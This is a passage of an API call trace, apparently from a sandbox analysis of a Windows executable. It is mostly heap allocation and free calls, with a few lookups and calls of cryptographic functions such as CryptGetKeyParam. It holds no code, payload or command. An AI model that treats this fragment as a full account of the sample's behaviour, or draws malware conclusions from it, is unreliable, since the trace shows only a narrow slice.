hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0161.818] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.818] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0161.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.823] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.823] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2848, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2848*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.824] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0161.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.825] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, 